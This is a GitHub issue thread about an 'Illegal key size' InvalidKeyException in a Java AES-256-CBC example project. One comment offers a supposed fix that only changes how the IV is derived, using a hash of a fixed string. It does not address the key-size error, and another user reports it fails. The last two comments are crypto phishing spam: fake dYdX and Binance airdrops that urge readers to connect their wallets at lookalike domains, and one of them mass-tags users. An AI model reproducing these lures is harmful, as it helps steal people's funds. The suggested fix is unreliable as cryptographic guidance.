### ISSUE TITLE
Illegal key size

### ISSUE THREAD

**Issue by arivasvera** [fukata/AES-256-CBC-Example#1]
``` sh
Exception in thread "main" java.lang.RuntimeException: java.security.InvalidKeyException: Illegal key size
    at AESUtil.encrypt(AESUtil.java:24)
    at AESMain.main(AESMain.java:10)
Caused by: java.security.InvalidKeyException: Illegal key size
    at javax.crypto.Cipher.a(DashoA13*..)
    at javax.crypto.Cipher.a(DashoA13*..)
    at javax.crypto.Cipher.a(DashoA13*..)
    at javax.crypto.Cipher.init(DashoA13*..)
    at javax.crypto.Cipher.init(DashoA13*..)
    at AESUtil.encrypt(AESUtil.java:21)
    ... 1 more
```

**Comment by yutuoygy** [comment]
@andresrivas1506 Hi, I have the same issues as yours, have you fixed that?

**Comment by arivasvera** [comment]
Hello @yutuoygy no, I haven't fixed that, sorry

**Comment by kounalem** [comment]
@arivasvera @yutuoygy Hi there.

You can use that fix:

```

private AlgorithmParameterSpec makeIv() {
        try {
            return new IvParameterSpec(sha256digest16(ENCRYPTION_IV));
        } catch (UnsupportedEncodingException e) {
            e.printStackTrace();
        }catch (NoSuchAlgorithmException e) {
            e.printStackTrace();
        }
        return null;
    }    
private byte[] sha256digest16(String ivString) throws NoSuchAlgorithmException, UnsupportedEncodingException {
        MessageDigest digest = MessageDigest.getInstance("SHA-256");
        digest.reset();
        for(int i=0;i<ivString.length();i++)
        {
            digest.update((byte)ivString.charAt(i));
        }
        // so you have 32 bytes here
        byte[]  b = digest.digest();

        // you can return it directly or you can cut it to 16 bytes
        return Arrays.copyOf(b, 16);
    }
```

Implement that at the **AESUtil.class**, and obviously replace the makeIv.
You can put whatever value you wish to the ENCRYPTION_IV now.
We will get the first 16 bytes of the String always.

@yutuoygy , btw thanks for putting that code to open source. It helped me.

**Comment by julred** [comment]
@kounalem:

Your fix doesn't work for me.
I replaced the makeIv function, and made both function to public static.
But nevertheless, I get:

'Exception in thread "AWT-EventQueue-0" java.lang.RuntimeException: java.security.InvalidKeyException: Illegal key size'

**Comment by muraliR** [comment]
## Congratulations! You've been chosen to receive a $7,000 Rewards. 🪂🔴 


### Trading and Launch Rewards are live on dYdX Chain! ✨

Connect your wallet, follow the instructions, and claim this exclusive offer from Dydx Exchange. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

[![Dydx Exchange](https://pbs.twimg.com/card_img/1729868185275617280/nzyJpc7G?format=jpg&name=small)](https://claim.dydxexchang.com/)


[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Rewards Now!** [Check Eligibility](https://claim.dydxexchang.com/)

Access the Dydx Exchange platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your Rewards, up to $2,000!

@dydxprotocol

**Comment by jmperezv** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @carturoch, @muryliang, @Steve-Louie-Bose, @dzmitry-lahoda, @youssefnotes, @mousike, @jtyang, @ardaogulcan, @levinem, @sharma-vikram, @senchabot-app, @wade0317, @yindynasty, @giangdinhtt, @llpj, @vanishcode, @LearningTheo, @josefernand, @CodeTeamLabs, @beoliver, @actiago, @parahren, @lowesusannah, @sequencer, @nodauf, @zhang98722, @klboke, @sospartan, @scorpionPM, @diarm36151, @Olliepop, @xer0x, @heholek, @matiasinsaurralde, @xiongwuwu, @darelover, @NupNik, @wangyan-dlut, @ruuderie, @danmx, @shenxuexiong, @MCRy, @neilrg2, @xiaomaguoguo, @yfgeek, @alixaxel, @Dimitrinski, @studiovc, @gdejohn, @itsrbpandit
